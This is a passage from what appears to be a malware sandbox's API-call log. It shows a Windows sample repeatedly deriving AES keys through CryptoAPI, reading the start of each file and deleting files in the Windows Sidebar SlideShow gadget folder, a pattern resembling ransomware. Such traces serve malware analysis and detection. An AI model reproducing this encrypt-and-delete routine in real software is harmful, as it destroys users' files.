returned 1 [0192.123] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.124] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\drag.png")) returned 0 [0192.124] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0192.124] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0192.125] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0192.126] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0192.126] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.126] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0192.126] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x510 [0192.126] ReadFile (in: hFile=0x5b0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0192.128] CryptDestroyHash (hHash=0x284d668) returned 1 [0192.128] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0192.128] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.129] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\settings.css")) returned 0 [0192.214] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0192.214] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0192.214] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.214] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0192.214] GetFileSize (in: hFile=0x5b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11b0 [0192.214] ReadFile (in: hFile=0x5b8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0192.262] CryptDestroyHash (hHash=0x284d568) returned 1 [0192.262] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0192.262] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.263] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\slideShow.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\slideshow.css")) returned 0 [0192.353] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.354] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.354] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.354] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.354] GetFileSize (in: hFile=0x5b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3dd [0192.354] ReadFile (in: hFile=0x5b4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.403] CryptDestroyHash (hHash=0x284d528) returned 1 [0192.403] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.403] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.404] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\gadget.xml")) returned 0 [0192.405] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0192.406] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0192.406] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0192.406] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.406] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0192.406] GetFileSize (in: hFile=0x5b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd96c [0192.406] ReadFile (in: hFile=0x5b4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0192.436] CryptDestroyHash (hHash=0x284d668) returned 1 [0192.436] CryptDestroyKey (hKey=0x284d528) returned 1 [0192.436] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.437] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\js\\slideshow.js")) returned 0 [0192.438] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.439] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.439] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.439] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0192.439] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1910 [0192.439] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.443] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0192.443] CryptDestroyKey (hKey=0x284d568) returned 1 [0192.443] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.444] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\settings.html")) returned 0 [0192.445] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.445] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.446] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.446] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0192.446] GetFileSize (in: hFile=0x5b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd64 [0192.446] ReadFile (in: hFile=0x5b8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.450] CryptDestroyHash (hHash=0x284d528) returned 1 [0192.450] CryptDestroyKey (hKey=0x284d568) returned 1 [0192.450] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.451] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\slideshow.html")) returned 0 [0192.452] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0192.453] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0192.453] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.453] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0192.453] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2732 [0192.453] ReadFile (in: hFile=0x5ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0192.493] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0192.493] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0192.493] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.495] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\icon.png")) returned 0 [0192.497] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0192.498] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.499] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.499] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.499] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0192.499] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd86 [0192.499] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.502] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0192.502] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0192.502] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.503] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\blank.png")) returned 0 [0192.503] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0192.504] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0192.505] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0192.505] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.505] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0192.505] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdf6 [0192.505] ReadFile (in: hFile=0x5ac, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0192.508] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0192.508] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0192.508] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.588] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\bg_sidebar.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\bg_sidebar.png")) returned 0 [0192.626] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0192.626] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0192.626] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.626] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0192.626] GetFileSize (in: hFile=0x5b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdb7 [0192.626] ReadFile (in: hFile=0x5b4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0192.628] CryptDestroyHash (hHash=0x284d668) returned 1 [0192.628] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0192.629] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.630] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\slideshow_glass_frame.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\slideshow_glass_frame.png")) returned 0 [0192.630] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.631] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.631] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.631] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0192.631] GetFileSize (in: hFile=0x5b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbf7 [0192.631] ReadFile (in: hFile=0x5b8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.633] CryptDestroyHash (hHash=0x284d528) returned 1 [0192.633] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0192.633] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.634] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_down.png")) returned 0 [0192.635] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.636] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.636] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.636] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0192.636] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbf9 [0192.636] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.638] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0192.638] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0192.638] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.639] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_hov.png")) returned 0 [0192.640] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.640] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.640] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.640] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0192.640] GetFileSize (in: hFile=0x5b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb57 [0192.640] ReadFile (in: hFile=0x5b8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.642] CryptDestroyHash (hHash=0x284d528) returned 1 [0192.643] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0192.643] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.644] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_rest.png")) returned 0 [0192.644] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0192.644] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0192.645] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0192.645] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.645] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0192.645] GetFileSize (in: hFile=0x5b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1589 [0192.645] ReadFile (in: hFile=0x5b8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0192.657] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0192.657] CryptDestroyKey (hKey=0x284d528) returned 1 [0192.657] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.658] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\slideshow_glass_frame.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\on_desktop\\slideshow_glass_frame.png")) returned 0 [0192.659] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.660] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.660] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.660] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.660] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbca [0192.660] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.662] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0192.662] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.662] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.663] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_down.png")) returned 0 [0192.663] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.664] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.664] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.664] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.664] GetFileSize (in: hFile=0x5b4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbd3 [0192.664] ReadFile (in: hFile=0x5b4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.666] CryptDestroyHash (hHash=0x284d528) returned 1 [0192.666] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.666] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.667] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_hov.png")) returned 0 [0192.805] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.806] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.806] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.806] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.806] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb11 [0192.806] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.808] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0192.808] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.808] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.810] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_rest.png")) returned 0 [0192.810] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0192.810] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0192.810] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.811] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0192.811] GetFileSize (in: hFile=0x5bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbf2 [0192.811] ReadFile (in: hFile=0x5bc, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0192.813] CryptDestroyHash (hHash=0x284d528) returned 1 [0192.813] CryptDestroyKey (hKey=0x284d668) returned 1 [0192.813] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0192.814] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_down.png")) returned 0 [0192.815] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, 